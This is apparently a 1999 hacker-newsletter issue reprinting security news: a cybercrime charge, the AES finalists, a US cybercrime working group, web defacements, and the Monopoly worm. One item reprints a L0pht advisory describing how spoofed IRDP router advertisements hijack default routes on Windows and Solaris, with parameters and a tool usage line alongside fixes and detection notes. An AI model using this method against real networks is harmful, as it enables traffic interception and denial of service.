http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Disrupting Net access a cybercrime? By Robert Lemos, ZDNN August 6, 1999 3:28 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html A former system administrator of the University of Oklahoma has been charged under the state's computer-crime statutes with slowing the university's network to a crawl. Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when hoards of incoming students downloaded pirated software from servers that he had allegedly set up on the university's network. "There were times when the authorized users -- students -- were not able to access the Internet at all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District Attorney's Office. Known as warez (pronounced "wares"), the software is identical to store-bought versions and includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the network, and many students were denied access. Getting up to speed While distributing such software is illegal, the district attorney's office has only charged Breding with interfering with network operation. On that charge alone, the former employee faces up to 10 years in the state penitentiary and up to $100,000 in fines. The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network." An initial lack of familiarity with computer crimes stymied the investigation. State investigators and prosecutors needed to learn how to pursue digital criminals and examine the evidence. "These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look into it." Palk stressed that, for the investigators, the case was a necessary learning experience. "This may be a hallmark of things to come," he said. "And we need to be ready." University officials would not comment for this story. A preliminary hearing is set to start on Aug. 17. @HWA 12.0 Chaos Computer Camp Fun For All Last Weekend ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex A computer, some beer, cyber friends, warm grass and a new moon, what more could you ask for? Chaos Computer Club Camp wrapped up over the weekend, people are saying it was the most fun they have had since HIP. Wired http://www.wired.com/news/news/culture/story/21159.html (Printed in last issue) 13.0 NIST Announces the AES Finalist Candidates ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench Five encryption technologies have made the final cut to be the next standard cryptographic mechanism used to protect sensitive government information. It has taken over a year to whittle the initial field of twelve entries down to five, one of which will replace DES, the current standard. The final standard is expected to be chosen by the Summer of 2001. The five finalists for the advanced encryption standard (AES), where named by the National Institute of Standards and Technology on Monday. The five finalists are MARS, RC6TM, Rijndael, Serpent, and Twofish. Advanced Encryption Standard (AES) Development Effort http://www.nist.gov/aes Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0809/web-nist-8-9-99.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html FCW; AUGUST 9, 1999 . . . 16:15 EDT NIST names finalists in AES development BY DIANE FRANK (dfrank@fcw.com) The National Institute of Standards and Technology today named the five finalists in its development of the next-generation Advanced Encryption Standard. NIST has been working with 15 candidates from 12 countries for the past year to test their submissions for the AES algorithm. NIST will use AES to replace the Data Encryption Standard adopted in 1977 as a federal information processing standard for federal agencies. The five finalists are MARS, developed by IBM Corp., Armonk, N.Y. RC6, developed by RSA Laboratories, Bedford, Mass. Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium. Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United Kingdom, Israel and Norway, respectively. Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall and Niels Ferguson, most of whom are associated with Counterpane Systems, Minneapolis, Minn. All of the candidate algorithms support cryptographic key sizes of 128, 192 and 256 bits and were tested by NIST and other cryptographic groups around the world. A full report on the process is available on the AES World Wide Web site at www.nist.gov/aes. -=- ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Finalists for new crypto standard named By Jim Kerstetter, PC Week August 9, 1999 1:05 PM PT URL: http://www4.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html?chkpt=hpqs014 DES is a step closer to the dustbin. The U.S. Commerce Department's National Institute of Standards and Technology (NIST) today announced five finalists in the two-year competition to find a replacement for the Data Encryption Standard, which has served as the government's basic encryption standard since 1977. The replacement, to be called the Advanced Encryption Standard (AES), should be completed by the summer of 2001, according to NIST. The five finalists include: MARS, developed by IBM in Armonk, NY. IBM researchers also created DES back in the '70s. RC6, developed by Ron Rivest (inventor of the RSA public key algorithm and several other well-known hashing and private key algorithms) and RSA Laboratories in Bedford, Mass. Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium. Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United Kingdom, Israel and Norway. Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall and Niels Ferguson of Counterpane Systems in Minneapolis. Schneier also developed the popular Blowfish symmetric algorithm. Resisting brute force DES -- as well as its replacement, AES -- is what cryptographers call a symmetric or private key algorithm. A symmetric algorithm requires that both parties receiving encryption have a copy of the same encryption key in order to read the scrambled data. It is also likely the most widely used encryption algorithm in the world today, supported by most commercial encryption products. But DES has proven to be easy prey for modern technology. It uses keys of 56 bits, which were first broken nearly three years ago. In January 1999, cryptographers using a special DES-cracking machine, along with a nationwide network of PCs, were able to crack DES in less than 24 hours. The crackers used a "brute force" method of attack to solve the mathematical factoring behind DES. In other words, they put a lot of processing horsepower against the algorithm and were able to solve it -- something that has been feasible only in the last couple of years because of improvements in chip technology. AES on the scene Enter the AES. NIST first requested proposals for the AES in September 1997. Each of the candidate algorithms supports key sizes of 128, 192 and 256 bits. A 128-bit key cannot be broken using known technology today. Each added bit essentially doubles the key strength. RSA Data Security Inc. CEO Jim Bidzos used the following analogy at the company's conference in January: A 40-bit key is the water that fills a spoon. A 56-bit key is the water that fills a small swimming pool. A 128-bit key would be all of the water on the planet. "The process has always been about standardization," said Counterpane's Schneier. "AES will be the encryption standard for the next 20 or so years, and hence will be used in applications that we can't imagine. If a single algorithm is to be chosen for AES, it must be efficient in all current and imagined applications." NIST will make the five finalist algorithms publicly available. Analysis of the finalists will be presented at a conference in April 2000, and public comments will be accepted until May 15, 2000, according to the NIST. @HWA 14.0 Clinton Designates Group to Look At CyberCrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ryan On Saturday August 7th, President Clinton issued an executive order to establish a working group to examine unlawful conduct on the internet. The group is to determine if current laws are adequate to combat online crime such as child pornography and sales of illegal drugs. The executive order also calls for closer examination of the tools used by law enforcement to investigate these crimes. This could be interpreted as a major call for key escrow. The group has been ordered to complete its reports within 120 days. US Newswire- Text of Executive Order http://www.usnewswire.com/topnews/Current_Releases/0807-107.htm ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2311209,00.html Wired http://www.wired.com/news/news/politics/story/21191.html Executive order; Text of Clinton Executive Order on Internet Conduct U.S. Newswire 7 Aug 11:07 Text of Clinton Executive Order Establishing Working Group to Examine Unlawful Conduct on the Internet To: National Desk Contact: White House Press Office, 202-456-2100 WASHINGTON, Aug. 7 /U.S. Newswire/ -- The following is the text of an Executive Order released today by President Clinton: EXECUTIVE ORDER - - - - - - - WORKING GROUP ON UNLAWFUL CONDUCT ON THE INTERNET By the authority vested in me as President by the Constitution and the laws of the United States of America, and in order to address unlawful conduct that involves the use of the Internet, it is hereby ordered as follows: Section 1. Establishment and Purpose. (a) There is hereby established a working group to address unlawful conduct that involves the use of the Internet ("Working Group"). The purpose of the Working Group shall be to prepare a report and recommendations concerning: (1) The extent to which existing Federal laws provide a sufficient basis for effective investigation and prosecution of unlawful conduct that involves the use of the Internet, such as the illegal sale of guns, explosives, controlled substances, and prescription drugs, as well as fraud and child pornography. (2) The extent to which new technology tools, capabilities, or legal authorities may be required for effective investigation and prosecution of unlawful conduct that involves the use of the Internet; and (3) The potential for new or existing tools and capabilities to educate and empower parents, teachers, and others to prevent or to minimize the risks from unlawful conduct that involves the use of the Internet. (b) The Working Group shall undertake this review in the context of current Administration Internet policy, which includes support for industry self-regulation where possible, technology-neutral laws and regulations, and an appreciation of the Internet as an important medium both domestically and internationally for commerce and free speech. Sec. 2. Schedule. The Working Group shall complete its work to the greatest extent possible and present its report and recommendations to the President and Vice President within 120 days of the date of this order. Prior to such presentation, the report and recommendations shall be circulated through the Office of Management and Budget for review and comment by all appropriate Federal agencies. Sec. 3. Membership. (a) The Working Group shall be composed of the following members: (1) The Attorney General (who shall serve as Chair of the Working Group). (2) The Director of the Office of Management and Budget. (3) The Secretary of the Treasury. (4) The Secretary of Commerce. (5) The Secretary of Education. (6) The Director of the Federal Bureau of Investigation. (7) The Director of the Bureau of Alcohol, Tobacco and Firearms. (8) The Administrator of the Drug Enforcement Administration. (9) The Chair of the Federal Trade Commission. (10) The Commissioner of the Food and Drug Administration; and (11) Other Federal officials deemed appropriate by the Chair of the Working Group. (b) The co-chairs of the Interagency Working Group on Electronic Commerce shall serve as liaison to and attend meetings of the Working Group. Members of the Working Group may serve on the Working Group through designees. WILLIAM J. CLINTON THE WHITE HOUSE, August 5, 1999. -0- /U.S. Newswire 202-347-2770/ 08/07 11:07 Copyright 1999, U.S. Newswire -=- ZDNET; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Clinton establishes Net crime taskforce By Maria Seminerio, ZDNN August 9, 1999 12:50 PM PT URL: UPDATED 3:30 PM PT President Clinton on Saturday established a working group to address cybercrimes, including online sales of illegal drugs and explosives, and online child pornography trafficking. The working group is charged with determining whether existing federal laws are sufficient to combat Internet-related crime. Also, in what seems like a call for widespread key escrow for encrypted communications, Clinton ordered the task force to determine "the extent to which new technology tools, capabilities or legal authorities may be required for effective investigation and prosecution of unlawful conduct" online. The issue of key escrow -- allowing law enforcement a guaranteed "back door" into encrypted online messages -- is hugely controversial, and has been a central bone of contention in the debate over the Clinton administration's encryption export policies. The director of the Federal Bureau of Investigation, Louis Freeh, is a vocal supporter of key escrow, but online privacy advocates believe any such plan would be disastrous for individual Internet users. "It's a valid concern," said David Sobel, general counsel at the Electronic Privacy Information Center, when asked whether the move is a precursor to a more aggressive key escrow push. Why no wider investigation? With the controversy over illegal Internet porn and online drug and gun sales having sizzled for some time, Sobel said it's unclear why the White House should now launch a wider investigation. It's also unclear what action, if any, Clinton will take after the group completes its report, a White House spokesman told ZDNN Monday. Clinton could urge Congress to pass new Net crime laws, although there is no specific plan for him to do so, the spokesman said. Another administration official, speaking on condition of anonymity, said the task force's work won't be specifically aimed at the key escrow issue. "We just wanted to take a step back and see what new laws, if any, are needed" to address cybercrimes, the official told ZDNN. The task force will include Freeh, Attorney General Janet Reno, and other federal officials, such as the director of the Office of Management and Budget, the Secretary of the Treasury, the Commerce Secretary and the director of the Bureau of Alcohol, Tobacco and Firearms. The co-chairs of the Advisory Commission on E-Commerce will serve as liaisons. Clinton ordered the group to complete a report within 120 days, and many federal agencies will have a chance to respond before it is made public. -=- Wired; Plan B for Cyber Space Wired News Report 5:00 p.m. 9.Aug.99.PDT President Clinton has asked his advisers to come up with new ways to combat illegal online activity including child porn and the sale of guns, drugs, and explosives. In announcing a new working group on unlawful conduct on the Internet, the Administration stopped short of calling for new laws. Instead, Vice President Gore said the feds may need new technology tools, capabilities, or legal authorities to fight cybercrime. "What we need to do is find new answers to old crimes," said Gore in a statement released Friday. About 11 federal agencies will participate in the working group, including the Bureau of Alcohol, Tobacco, and Firearms; the FBI; the Commerce Department; the Food and Drug Administration; and the Drug Enforcement Agency. Each agency will solicit ideas for deterring cybercrime from the private sector and from state and local law enforcement officials. "The working group will help to make the Internet a safe place for all Americans by examining the extent to which existing federal law and technological tools are effective in combating crime on the Internet," Gore said. The working group will make its recommendations in four months in the context of current policies and principles. Among those principles: that industry should self-regulate, that laws should be technology-neutral, and that the Internet is an important medium for commerce and free speech. The administration announced the new strategy only weeks after lawmakers and privacy activists panned a Clinton-approved plan to develop a nationwide surveillance network. That proposed network, recommended by the White House National Security Council and known as the Federal Intrusion Detection Network (Fidnet), sought to fight cybercrime by vacuuming up electronic signals. Prominent House republicans slammed that plan. House Majority Leader Dick Armey warned that the Fidnet could grow into an "Orwellian" system. @HWA 15.0 Taiwan Government Web Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Several Taiwanese government web sites have been defaced by someone claiming to be from the Hunan province in China. The defacements contained political statements, in Chinese and English, concerning Taiwan's political status. An unidentified official said that he did not think that firewalls where necessary on public web servers. Excite News http://news.excite.com/news/r/990809/02/net-taiwan-hacker Pro-China Hacker Attacks Taiwan Govt. Web sites Updated 2:58 AM ET August 9, 1999 TAIPEI, Taiwan (Reuters) - A person claiming to be from mainland China hacked into several Taiwan government Internet sites to insert pro-China messages amid a heated row between the two sides over Taiwan's political status. "Only one China exists and only one China is needed," read a message inserted Sunday into the Web site of the Control Yuan -- Taiwan's highest watchdog agency. In apparent references to President Lee Teng-hui's controversial call for "special state-to-state" ties between Taiwan and China, the message said Taiwan was and would always be an inseparable part of China. "The Taiwanese government headed by Lee Teng-hui can not deny it." The same messages -- in Chinese and English -- were placed in several other government Web sites, a Control Yuan official said Monday. "It looks like it was the same person who claimed to come from Hunan province," the official, who declined to be identified, said by telephone. The official said public Web sites were relatively easy to hack into. "It is a public Web site containing open information, so we didn't think firewalls were necessary," the official said. "Now we know it's a problem and we will fix it in the next few days." Firewalls are electronic security screens. Lee's redefinition of cross-strait ties has infuriated Beijing, which views the island as a wayward province and vows to bring it under mainland rule, by force if necessary. @HWA 16.0 DoD Ordered to Change All Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarge The Defense Department has ordered all administrative and user passwords on their unclassified networks to be changed. The official reason is to protect against possible Y2K cyber attacks. Rumours indicate that this order may be the result of recent computer security breaches. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0809/fcw-newsdod-08-09-99.html AUGUST 9, 1999 DOD: Change Passwords BY DANIEL VERTON (dan_verton@fcw.com) Concerned that efforts to fix computer systems for the Year 2000 problem may expose its information infrastructure to cyberattacks, the Defense Department has ordered its network managers to change all administrative and user passwords on their unclassified networks. The order is the result of mandatory guidance issued last month to all of the military services' network security organizations by the Joint Task Force for Computer Network Defense. While a JTF-CND spokesperson could not confirm or deny rumors that the guidance may be the result of a recent breach of computer security, the spokesperson said that the FBI's National Infrastructure Protection Center is currently investigating intrusions into unclassified DOD networks. "We're trying to start a better process for password protection," the spokesperson said. "We gave [our components and other DOD organizations] several weeks to do this [because] we know it can't be done overnight." The JTF-CND, which was formed last December, serves as the focal point for DOD to organize the defense of DOD computer networks and systems. When cyberattacks are detected, the JTF-CND is responsible for directing departmentwide defenses to stop or contain damage and restore DOD network functions operations. The mandatory actions called for by the JTF-CND directive include changing all administrative and user passwords for all unclassified systems and then restarting the operating systems for systems that are connected to the network. The process is known as a "warm boot" and is not a full shutdown of the system, the spokesperson said. Major commands affected by the guidance and responsible for managing compliance in their respective services include the Air Force Information Warfare Center, the Army's Land Information Warfare Activity, the Defense Information Systems Agency, the Marine Corps' Marine Forces-CND and the Navy Component Task Force-CND. As a result of the directive, the NCTF-CND issued classified and unclassified messages ordering password changes. However, a spokesman for the Space and Naval Warfare Systems Command, one of the primary recipients of the message, declined to comment because of the sensitivity of the message's content. In an administrative message issued last week by the NCTF-CND, the Navy offered technical guidance to system administrators on how to deal with the lack of password date-change tracking functionality in Microsoft Corp.'s Windows NT. As a result, the Navy has made three software tools available over the Internet to help administrators automate the enforcement of password changes. In May, Art Money, senior civilian official acting as the assistant secretary of Defense for command, control, communications and intelligence, issued a DOD-wide memorandum about the potential threat to DOD networks posed by the Year 2000 computer problem. In that memo, Money cited DOD Administrative Instruction 26, which provides specific guidance on the use of passwords. A DOD spokesperson said there is "no inherent connection between the May 5 Money memo and the July 23 [JTF-CND] message -- other than they are related in the context of the department constantly putting out guidance that requires vigilance over our networks." @HWA 17.0 Belgians Under Cyber Attack From One Man ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by superman ReDatAck, a Belgian man, has claimed to have broken into the database of Skynet, owned by Belgian state-run telecommunications operator Belgacom, and accessed private information on over 1,000 users. The information allegedly includes credit card numbers and passwords. ReDatAck has also claimed to have broken into the free address book server of Lycos. ReDatAck has said that he is trying to alert people to the security weaknesses of the internet. Yahoo News http://dailynews.yahoo.com/h/nm/19990809/wr/belgium_hacker_1.html Monday August 9 12:38 PM ET Belgian Hacker Warns Of Internet Security Risk BRUSSELS (Reuters) - A computer hacker who broke into Belgium's leading Internet access provider vowed Monday to carry on attacking Web sites and databases in a bid to alert Belgium to the security risks of the Internet. ``ReDatAck'', a man in his twenties, told Reuters by telephone he had broken into the database of Skynet, owned by Belgian state-run telecomm- unications operator Belgacom, Friday night and obtained secret information on over 1,000 users. ``I have...their Visa (credit card) numbers and expiration dates, their login and passwords, access to their Web sites,'' ''ReDatAck'' said, stressing he wanted to `wake up Belgium'' to the Internet's security risks rather than misuse the information. ``Nobody thinks about security,'' he said. Skynet director Philippe Lemmens said Monday he planned to file a complaint against ``ReDatAck'' and assured users that security had been stepped up against future hackers. But ``ReDatAck'', who claimed he had also broken into the free address book server of U.S. Internet portal Lycos, was undeterred. ``I'll go on hacking. They can try to find me. It doesn't scare me. If they do find me, it will make more publicity,'' he said, adding that he was currently working on breaking into a hospital database. He declined to say which hospital. @HWA 18.0 IRDP Hole in Win and Sol Leave Users Open to Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Silicosis By spoofing IRDP Router Advertisements, an attacker can remotely add default route entries on a remote system, including most Windows machines and some Solaris systems. The attackers default route entry will be preferred over the DHCP servers default route. DHCP addressing is used by many corporations, cable modem systems, and dialup ISPs. This attack significantly increases a users risk to passive snooping, man-in-the-middle attacks, and denial of service attacks. L0pht Heavy Industries - Full advisory with sample code and patches http://www.l0pht.com L0pht Security Advisory Release date: August 11, 1999 Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b Windows98, Windows98se and Sun Microsystems SunOS & Solaris operating systems. Severity: Attackers can remotely add default route entries on the victims host. Status: Microsoft contacted, fix provided. Author: sili@l0pht.com URL: http://www.L0pht.com/advisories.html Source code: http://www.l0pht.com/advisories/rdp.tar.gz code written by Silicosis & Mudge I. Problem ---------- The ICMP Router Discovery Protocol (IRDP) comes enabled by default on DHCP clients that are running Microsoft Windows95 (w/winsock2), Windows95b, Windows98, Windows98se, and Windows2000 machines. By spoofing IRDP Router Advertisements, an attacker can remotely add default route entries on a remote system. The default route entry added by the attacker will be preferred over the default route obtained from the DHCP server. While Windows2000 does indeed have IRDP enabled by default, it less vulnerable as it is impossible to give it a route that is preferred over the default route obtained via DHCP. SunOS systems will also intentionally use IRDP under specific conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started if the following conditions are met: . The system is a host, not a router. . The system did not learn a default gateway from a DHCP server. . The system does not have any static routes. . The system does not have a valid /etc/defaultrouter file. It should be noted that the important point of this advisory is not that ICMP Router Solicitation and Advertisement packets have no authentication properties. Yes, this is a problem but it has long been known. The dangerous aspect comes in various MS platforms enabling this protocol and believing it _even when the DHCP setup specifies router information_ (ie the operating system does this even though you believe you are telling it NOT TO). The tool provided with this advisory is the basis of what would be used for everything from web page hacks, stealing credentials, modifying or altering data, etc. involving vulnerable systems. We believe most cable modem DHCP clients and large internal organizations are at risk. II. Risks --------- The ICMP Router Discovery Protocol does not have any form of authentication, making it impossible for end hosts to tell whether or not the information they receive is valid. Because of this, attackers can perform a number of attacks: Passive monitoring: In a switched environment, an attacker can use this to re-route the outbound traffic of vulnerable systems through them. This will allow them to monitor or record one side of the conversation. * For this to work, and attacker must be on the * same network as the victim. Man in the Middle: Taking the above attack to the next level, the attacker would also be able to modify any of the outgoing traffic or play man in the middle. By sitting in the middle, the attacker can act as a proxy between the victim and the end host. The victim, while thinking that they are connected directly to the end host, they are actually connected to the attacker, and the attacker is connected to the end host and is feeding the information through. If the connection is to a secure webserver that uses SSL, by sitting in the middle, the attacker would be able to intercept the traffic, unencrypted. A good example of this risk is on-line banking; an attacker playing man-in-the-middle would be able to intercept all of the banking information that is relayed, without the victim's knowledge. * For this to work, and attacker must be on the * same network as the victim. Denial of Service: Remote attackers can spoof these ICMP packets and remotely add bad default-route entries into a victims routing table. Because the victim's system would be forwarding the frames to the wrong address, it will be unable to reach other networks. Unfortunately, DHCP has quickly become popular and is relied upon in most companies. In some cases, such as cable & *DSL modems, users are required to use DHCP. Because of the large number of vulnerable systems, and the fact that this attack will penetrate firewalls that do not stop incoming ICMP packets, this Denial of Service attack can become quite severe. It should be noted that the above attacks are documented in Section 7, of RFC 1256. However, the RFC states states that the attacks are launched by an attacker on the same network as the victim. In the Denial of Service attack, this is not the case; an attacker can spoof IRDP packets and corrupt the routing tables on systems that are on remote networks. While these attacks are not new, the fact that Windows95/98 DHCP clients have been vulnerable for years, is. On systems running SunOS & Solaris, it is easy to find documentation on IRDP by looking at the startup scripts or manpages. On Windows95/98, however, information has only become recently available in the Knowledge Bank. III. Technical Details ---------------------- Upon startup, a system running MS Windows95/98 will always send 3 ICMP Router Solicitation packets to the 224.0.0.2 multicast address. If the machine is NOT configured as a DHCP client, it ignores any Router Advertisements sent back to the host. However, if the Windows machine is configured as a DHCP client, any Router Advertisements sent to the machine will be accepted and processed. Once an Advertisement is received, Windows checks to see how many Gateway entries the packet contains. If the packet contains only 1 entry, it checks to make sure the IP source address of the Advertisement is inside the hosts subnet. If it is, the Router Address entry inside the advertisement is checked to see that it is also within the host's subnet. If so, a new default route entry is added. If the address is outside the subnet, it the advertisement is silently ignored. If a host receives a Router Advertisment that contains 2 or more Router Addresses, the host will processes the packet even though the IP source address is not local. If the host finds a Router Address inside the advertisement that is inside the host's subnet, it will add a default route entry for it. Because the host does not care about the IP source address of the Advertisement as long as it has more than one entry, attackers can now create bogus IRDP packets that will bypass anti-spoofing filters. Before the host can add a new default route entry, it has to determine the route metric. On Windows95/98, normal default route entries obtained from a DHCP server have a metric of 1. In order to determine the metric for the default route entry obtained via IRDP, the Windows host subtracts the Advertisement's Preference value from 1000. By creating an ICMP Router Advertisement with a preference of 1000, the default gateway route added will have a metric of 0, making it the preferred default route. By adjusting the Lifetime value in the advertisement, an attacker can adjust how many seconds the gateways are valid for. IV. Fixes / Work-arounds ------------------------ Firewall / Routers: Block all ICMP Type 9 & Type 10 packets. This should protect against remote Denial of Service attacks. Windows95/98: The Microsoft Knowledge Base contains an article that gives info on how to disable IRDP. It can be found at: http://support.microsoft.com/support/kb/articles/q216/1/41.asp Brief Summary of article: IRDP can be disabled manually by adding "PerformRouterDiscovery" value name and setting it to a dword value of 0, under the following registry key(s): HKLM\System\CurrentControlSet\Services\Class\NetTrans\#### Where #### is the binding for TCP/IP. More than one TCP/IP binding may exist. Solaris: Configure your host to obtain a default gateway through DHCP, static routes, or via the /etc/defaultrouter file. For more information on IRDP refer to in.rdisc's man-page. V. Detection ------------- L0pht has released a NFR Intrusion Detection Module to detect both Router Solicitations and Advertisements. You can find it at: http://www.l0pht.com/NFR NFR information can be found at http://www.nfr.net VI. Source Code ----------- L0pht is making available Proof-of-Concept code that will let individuals test their systems & firewalls. The source code can be found at: http://www.l0pht.com/advisories/rdp.tar.gz Usage is fairly straight forward: Usage: rdp -v -l -s -d -p -t -i -S -D -R -r -v verbose -l listen mode -s send mode -d -n -I -p -t -i -S -D -R -r Misc software notes: Listen Mode: Software listens for ICMP Router Solicitations. If the '-s' flag is specified as well, the software will answer the Solicitations with ICMP Router Advertisements. Preference: If the preference is not specified, it will use a default of 1000, which will give the default route a metric of 0 on affected Windows systems. 2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the end host. @HWA 19.0 More Government Sites Defaced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The Federal Energy Regulatory Commission has had its web page defaced by someone known as 'Sarin' FERC is a government agency that regulates the transmission and sale of oil, natural gas, electricity and regulates hydroelectric projects. The web page defacement called for the replacement of the administrator of the site. Also recently defaced was the U.S. Department of Commerce Institute for Telecommunication Sciences. This site was defaced by 'Pakistan Hackerz Club' the page they left behind claimed to own America and threatend additional nuclear tests unless Pakistan's internal affairs are not messed with. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2312517,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Another Fed Web site knocked out By Charles Cooper, ZDNN August 10, 1999 11:01 PM PT URL: The Web site for the Federal Energy Regulatory Commission was hacked Tuesday night. Instead of the usual bureaucratic greetings found on government Web sites, people attempting to access the page were met by a cartoon character of a female vamp holding a whip. The hack, which was claimed by "Sarin," also left a brief note, taunting administrators for leaving their site vulnerable to hacks after "widespread publicity" given to copycat attacks in the last several months. "I'd seriously consider hiring a new admin if I were you," Sarin wrote. It was unclear when the Web site went down, but in an e-mail to ZDNN at 7:56 PM Pacific Time, Sarin wrote, "Does anyone care I have complete control over the Federal Energy Regulatory Commission?" Attempts to reach Sarin for comment were not immediately successful. Hackers intent on teaching sloppy system administrators an embarrassing lesson have carried out attacks against numerous federal Web sites this year, most prominently those operated by NASA, the National Oceanic and Atmospheric Administration and the United States Army. This isn't a new phenomenon. Indeed, in a 1998 report, the U.S. General Accounting Office chastised many government agencies for leaving holes in their information security defenses. @HWA 20.0 Taiwan Strikes back at China via Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Albert In response to recent attacks on various Taiwan government web sites some Taiwanese individuals are attacking web sites in mainland China. Excite News http://news.excite.com/news/r/990810/08/net-china-hacker Taiwan Cyber-Hackers Strike Back At China Updated 8:38 AM ET August 10, 1999 TAIPEI (Reuters) - Taiwan may be dwarfed by its saber-rattling rival, mainland China, but it has shown it is not to be trifled with on at least one battleground -- cyberspace. Hackers from the computer-savvy island have inserted pro-Taiwan messages into several Communist Chinese government Web sites in retaliation for a similar attack on Taiwan government sites by a mainland Chinese hacker. The web attacks sparked concern from military authorities who said an Internet war could add to already simmering tension over Taiwan's drive for equal status with the mainland. Taiwan news media reported Tuesday that several local hackers had succeeded in inserting Taiwan's flag, a sound file that played its national anthem and pictures of Taiwan presidential candidates on mainland Chinese Web sites. Statements like "Counter the Chinese Communists," "Taiwan does not belong to China" and "Seriously, Taiwan is better" also popped up on some of the sites. The hackers from Taiwan, which makes many of the world's computers, were also believed responsible for a revolving image of the Japanese cartoon figure Hello Kitty on one Web site. The hackers struck after a weekend attack on official Taiwan sites by a person claiming to be from mainland China, who inserted messages such as "Only one China exists and only one China is needed." The mainland hacker was apparently angered by Taiwan President Lee Teng-hui's call for "special state-to-state" ties between Taiwan and China, something Beijing has furiously condemned and threatened to punish with military action. Beijing views Taiwan as a wayward province and vows to bring it under mainland rule. @HWA 21.0 Monopoly Virus Taunts Bill Gates and Microsoft ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirB A new Melissa like virus called VBS/Monopoly uses a picture of Bill Gates and a Monopoly board to taunt the giant company. The virus uses the Melissa like tactic of sending itself to entries inside your address book but so far has not become wide spread. It also sends a wide variety of information about the infected computer to numerous other email addresses. MSNBC http://www.msnbc.com/news/299142.asp Monopoly virus taunts Microsoft Another Melissa-like work, this one could spread quickly but hasn’t yet been discovered in the wild By Bob Sullivan MSNBC Aug. 10 — There’s a new Melissa-like computer virus that not only attacks Microsoft software, it taunts the software giant’s leader. The so-called VBS/Monopoly virus pops up a dialog box that says, “Bill Gates is guilty of monopoly. Here is the proof. :-)” and then displays a picture of Gates superimposed on a Monopoly game board. It also sends itself to every e-mail in the victim’s address book. But anti-virus firms say the virus is not yet spreading widely around the Internet. NOTICE OF THE VIRUS WAS apparently first posted by a Russian anti-virus lab, Kaspersky Labs AVP, on Monday. (Microsoft is a partner in MSNBC.) Like Melissa, it arrives to victims as an e-mail attachment to a note. The subject line on the e-mail is “Bill Gates joke.” But unlike Melissa, anti-virus companies have been alerted to it before it was able to spread, so it won’t likely have Melissa-like widespread impact. Users who don’t double-click on the attachment, which is named MONOPOLY.VBS, cannot be infected. The .vbs extension indicates that the program is written in Microsoft’s Visual Basic scripting language. According to Dan Takata of Data Fellows, programs written with VBScript operate only under Windows 98 and Windows 2000 (unless Windows Scripting Host has been installed separately). Along with displaying the image of Gates, the worm/virus sends itself to every e-mail in the victim’s Outlook address book. It also collects information about the victim, including registered user name and organization, network computer name, country and area code, language, Windows version and Internet Explorer start page. It sends that information to a variety of e-mail addresses, probably to be accessed later by the virus author. But the virus has not been detected “in the wild,” according to anti-virus companies. “It’s still a zoo virus,” said Network Associates’ Tony Wells, meaning at the moment no victims have been identified, and the program has been confined to anti-virus laboratories. “We’re classifying it as a low risk.” Wells said Network Associates’ anti-virus products have been updated to protect customers from the virus. @HWA 22.0 FBI fingerprint database now online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by pigeon Officials in 15 states can now submit fingerprints to an online database to look for possible matches. The database, known as the Integrated Automated Fingerprint Identification System, which cost $640 million, contains the fingerprints of 34 million people. Searches now take two hours instead of 15 days. All 50 states will eventually be connected to this system. Nando Times http://www.nandotimes.com/technology/story/0,1643,80191-126589-888747-0,00.html FBI touts online fingerprint database Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's 